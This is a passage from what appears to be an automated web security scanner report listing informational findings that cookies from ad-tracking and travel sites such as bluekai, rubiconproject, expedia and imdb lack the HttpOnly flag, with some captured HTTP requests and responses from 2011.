The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.175. http://tags.bluekai.com/site/353 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/353

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=s9pWoq9yk+ud8JkA; expires=Sat, 10-Dec-2011 11:13:39 GMT; path=/; domain=.bluekai.com
bkc=KJhnjsHQZB4ByweTyN54/J1CWDMWLYeTcJy1ew5SsHi6l0cTMVVGd9R6wAQdMeIBZRsOfyAMQTf1upi4YTtFvT4vd8psQ1ndC1qdi1SFLAnkzbeh4NiiXMIQXjIiXuKSG4/7GwaOdGwhmqARscjBjt9xxIv7Bvw0cH+xIu9Sho4MjVY/DsPWTq2Hx8Dctx4M9ye+9D2P; expires=Sat, 10-Dec-2011 11:13:39 GMT; path=/; domain=.bluekai.com
bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101UfXTSLFDJvOkuWF1ETpHRqO01ex61eD6BEx6LMzy1n10Be/p9H/saGSVCi9a919PW6uv9==; expires=Sat, 10-Dec-2011 11:13:39 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.176. http://tap.rubiconproject.com/oz/feeds/targus/profile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cd=false; Domain=.rubiconproject.com; Expires=Tue, 12-Jun-2012 11:21:43 GMT; Path=/
dq=10|5|5|0; Expires=Tue, 12-Jun-2012 11:21:43 GMT; Path=/
xdp_ti="13 Jun 2011 11:21:43 GMT"; Version=1; Max-Age=604800; Path=/
lm="13 Jun 2011 11:21:43 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.177. http://tap.rubiconproject.com/oz/sensor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cd=false; Domain=.rubiconproject.com; Expires=Tue, 12-Jun-2012 11:22:16 GMT; Path=/
dq=10|4|6|0; Expires=Tue, 12-Jun-2012 11:22:16 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.178. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

khaos=GOVBRMNC-I-DXQD; Domain=.rubiconproject.com; Expires=Tue, 11-Jun-2019 11:21:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.179. http://tiger.vizu.com/a.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tiger.vizu.com
Path:	/a.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ptc=1879%3D728x90-2;Path=/;Domain=.vizu.com;Expires=Wed, 13 Jul 2011 11:25:59 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.180. http://timecom.122.2o7.net/b/ss/timecom/1/H.20.2/s79694016552530 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://timecom.122.2o7.net
Path:	/b/ss/timecom/1/H.20.2/s79694016552530

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_snjbdhj=[CS]v4|26FAF980051D1E46-4000012A4013F6EF|4DF5F1E9[CE]; Expires=Sat, 11 Jun 2016 11:22:40 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.181. http://tr.adinterax.com/re/mcclatchyinteractive%2CDFW_Y_Star-tel_LB_0222%2CC%3DDFW_Mavericks%2CP%3DDFW-StarTelegram%2CK%3D492697/0.8334790775552392/0/in%2Cti/ti.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tr.adinterax.com
Path:	/re/mcclatchyinteractive%2CDFW_Y_Star-tel_LB_0222%2CC%3DDFW_Mavericks%2CP%3DDFW-StarTelegram%2CK%3D492697/0.8334790775552392/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

adxf=715836@1@127.721919@1@131.487338@1@131.766144@1@131.492697@1@138; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.182. http://tvfanatic.us.intellitxt.com/intellitxt/front.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tvfanatic.us.intellitxt.com
Path:	/intellitxt/front.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VM_USR="AJMPkWzp50e+mCjNOtx/e8kAADsIAAA7XgIAAAEwiL1MrgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Fri, 12-Aug-2011 11:22:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.183. http://u.openx.net/w/1.0/sc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://u.openx.net
Path:	/w/1.0/sc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; Version=1; Expires=Tue, 12 Jun 2012 11:01:45 GMT; Max-Age=31536000; Domain=.openx.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.184. http://vap3den1.lijit.com/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vap3den1.lijit.com
Path:	/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; expires=Tue, 12-Jun-2012 11:02:43 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.185. http://viacom.adbureau.net/LSERVER/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://viacom.adbureau.net
Path:	/LSERVER/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

GUID=00000A66F2050DF5217E1D2961626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=viacom.adbureau.net
LE4=+5KVyrtKq+414+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=viacom.adbureau.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LSERVER/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Mon, 13 Jun 2011 11:18:29 GMT
X-DirectServer: viacom_DS15
Content-Type: application/x-javascript
Content-Length: 399
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=00000A66F2050DF5217E1D2961626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=viacom.adbureau.net
Set-Cookie: LE4=+5KVyrtKq+414+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<body>");
document.writeln("<iframe src=\"http://view.atdmt.com/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site
...[SNIP]...

13.186. http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://viacom.adbureau.net
Path:	/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=viacom.adbureau.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Mon, 13 Jun 2011 11:18:28 GMT
X-DirectServer: viacom_DS21
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /LSERVER/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90

13.187. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s75181884909979 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://viamtv.112.2o7.net
Path:	/b/ss/viamtv/1/H.22.1/s75181884909979

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_pogkrp=[CS]v4|26FAF9D50514A5EA-4000016020003946|4DF5F223[CE]; Expires=Sat, 11 Jun 2016 11:25:30 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.188. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s77238202237058 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://viamtv.112.2o7.net
Path:	/b/ss/viamtv/1/H.22.1/s77238202237058

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_pogkrp=[CS]v4|26FAF9D5851634F6-400001A0A0010331|4DF5F223[CE]; Expires=Sat, 11 Jun 2016 11:25:31 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.189. http://vt.imiclk.com/cgi/vtc.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vt.imiclk.com
Path:	/cgi/vtc.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CH=32766,00000,18654,53bro,18661,53bro,24785,53c27,34985,00000,24783,53c27,18653,53bro,33114,00000,37991,00000,36760,00000,32619,00000,38066,00000,19029,58T8w,32620,00000,24775,00000,34986,00000,28363,53br0,22244,53br0,34505,00000,24782,53c27,19037,58T8w,34030,00000,32680,00000,34698,00000,34506,00000,19036,58T8w; domain=.imiclk.com; path=/; expires=Tue, 12-Jun-2012 11:03:29 GMT
RQ=3151,57rv5,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3425,58T8w,1042,58T8w,1182,58T8w,1271,58T8w,1273,58T8w,1286,58T8w,1339,58T8w,1909,58T8w,2170,5DuCE,1211,58T8w,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; domain=.imiclk.com; path=/; expires=Tue, 12-Jun-2012 11:03:29 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.190. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

/ad21868.12106=,CFC,GFC; path=/
/SO=:463:; path=/
/SC=0-33A.1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:18:26 GMT
Content-Length: 516
Connection: close
Set-Cookie: TID=1; path=/; expires=Tue, 15-Mar-2011 11:18:25 GMT; domain=.burstnet.com
Set-Cookie: /ad21868.12106=,CFC,GFC; path=/
Set-Cookie: TData=1; path=/; expires=Tue, 15-Mar-2011 11:18:25 GMT; domain=.burstnet.com
Set-Cookie: CMS=1; path=/; expires=Tue, 15-Mar-2011 11:18:25 GMT; domain=.burstnet.com
Set-Cookie: CMP=1; path=/; expires=Tue, 15-Mar-2011 11:18:25 GMT; domain=.burstnet.com
Set-Cookie: __qca=1; path=/; expires=Tue, 15-Mar-2011 11:18:25 GMT; domain=.burstnet.com
Set-Cookie: /SO=:463:; path=/
Set-Cookie: /PC=0; path=/; expires=Mon, 20-Jun-2011 11:18:25 GMT
Set-Cookie: /SC=0-33A.1; path=/

document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90\"></SCR'+'IPT>');

document.write('<img src="http://b.scorecardresearch.com/b?C1=8
...[SNIP]...

13.191. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/prod/xmlgrid/loadingImage.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SSRT1=DPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.192. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SSRT1=DvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

13.193. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/prod/xmlgrid/psf/PsfGridActivities.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SSRT1=EPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:12 GMT
ipsnf3=v.3|US|1|511|washington; expires=Wed, 13-Jun-2012 00:00:01 GMT; path=/; domain=.expedia.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.194. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/deals/summervacationsale/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SSRT1=-_P1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:26:51 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.195. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/deals/summervacationsale/destination_deals.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SSRT1=DPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.196. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.197. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.198. http://www.expedia.com/hotel.h892034.Hotel-Information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/hotel.h892034.Hotel-Information

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SSRT1=EvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:14 GMT
iEAPID=0000,; Domain=.expedia.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.199. http://www.googleadservices.com/pagead/aclk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Conversion=Co0CQmJ4RkJZX0wxVGR6Sk9NejhsUWZKbWFIeENOZnEtTk1CcjU2VTdCalR4ZTNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKMXZLR3lLUDhHb0lCRjJOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlvQUhEOHYzc0E3SUJEM2QzZHk1MGQyRmphMnhsTG1OdmJib0JDVGN5T0hnNU1GOWhjOGdCQ2RvQklHaDBkSEE2THk5M2QzY3VkSGRoWTJ0c1pTNWpiMjB2YUdWaFpHeHBibVZ6bUFMUUQ4QUNCTWdDaGRMUENxZ0RBZWdEaUFMb0E3VUk5UU1BQUFEQWdBYUdwcWFieThUZHhfRUISEwjage-Q47KpAhWC3OAKHU1zeykYASCj753Rj6Koy2BIAQ; expires=Wed, 13-Jul-2011 11:26:51 GMT; path=/pagead/conversion/1033861443/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=BbxFBY_L1TdzJOMz8lQfJmaHxCNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaGpqaby8Tdx_EB&num=1&client=ca-pub-7494156027018342&val=ChAwY2E0MmQ4MTM3MDAwMGIzEM-pue4EGgjtg8uujvUQZyABKAE&sig=AGiWqtxDR23mpi6nXbTHMqSpx6TmN48Hfw&adurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp%3Fmcicid%3Dsummersale2011%3Fbrandcid%3DbrandCampaign HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=Co0CQmJ4RkJZX0wxVGR6Sk9NejhsUWZKbWFIeENOZnEtTk1CcjU2VTdCalR4ZTNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKMXZLR3lLUDhHb0lCRjJOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlvQUhEOHYzc0E3SUJEM2QzZHk1MGQyRmphMnhsTG1OdmJib0JDVGN5T0hnNU1GOWhjOGdCQ2RvQklHaDBkSEE2THk5M2QzY3VkSGRoWTJ0c1pTNWpiMjB2YUdWaFpHeHBibVZ6bUFMUUQ4QUNCTWdDaGRMUENxZ0RBZWdEaUFMb0E3VUk5UU1BQUFEQWdBYUdwcWFieThUZHhfRUISEwjage-Q47KpAhWC3OAKHU1zeykYASCj753Rj6Koy2BIAQ; expires=Wed, 13-Jul-2011 11:26:51 GMT; path=/pagead/conversion/1033861443/
Cache-Control: private
Location: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:26:51 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block

13.200. http://www.imdb.com/title/tt0944947/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imdb.com
Path:	/title/tt0944947/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cs=i4ngtxIow2LA4IAykCSLUAc/2jlwaVoPNU3JeXR+bJ3wytldB18NKdBpWjlA4XqxAyp5KuNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
cs=/xklkJ6UmgbIlDzGK7GnmQgOAn3+SVT9y+wjW946F35pfwPtXklU/c7BZHV9CnfubUonbp7p9+7OSVT9yK4Uvd5JVMtpSdz9/kliy+7BVP39WsR17do3vt1aZ/6NSlRdWF+Srs7fYurOSVS9XlkU3f5pVP3+SVS9vhkkzf;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
cs=ORTpIPsfQKC0ad7UcfTa2wbpWjlwaWx+JhpqOXQuT6og+kkaN18NKdBpWjlA4Rqx4yp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
cs=r74zZnN5GNCNLsB54oX4bA5/E6t5KVT9+eoAzo7KZ6kJfwPtXklU/c7BBHVdCnfe/Uonbp7p9+7OSVT9yK4Uvd5JVMtpSdz9/kliy+7BVP39WsR17do3vt1aZ/6NSlRdWF+Srs7fYurOSVS9XlkU3f5pVP3+SVS9vhkkzf;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
cs=0y5MmSeCFA7tJZdckMibLwc/2jlwaVoPN88euXRfHKxQysk6918NKdBpWjlA4Tqxwyp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
cs=Ms2AwBeH6407dvGQvS6P4gbpWjlwaWx+Ix4KOXZ6HU9Q+nkaF18NKdBpWjlA4Sqxsyp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
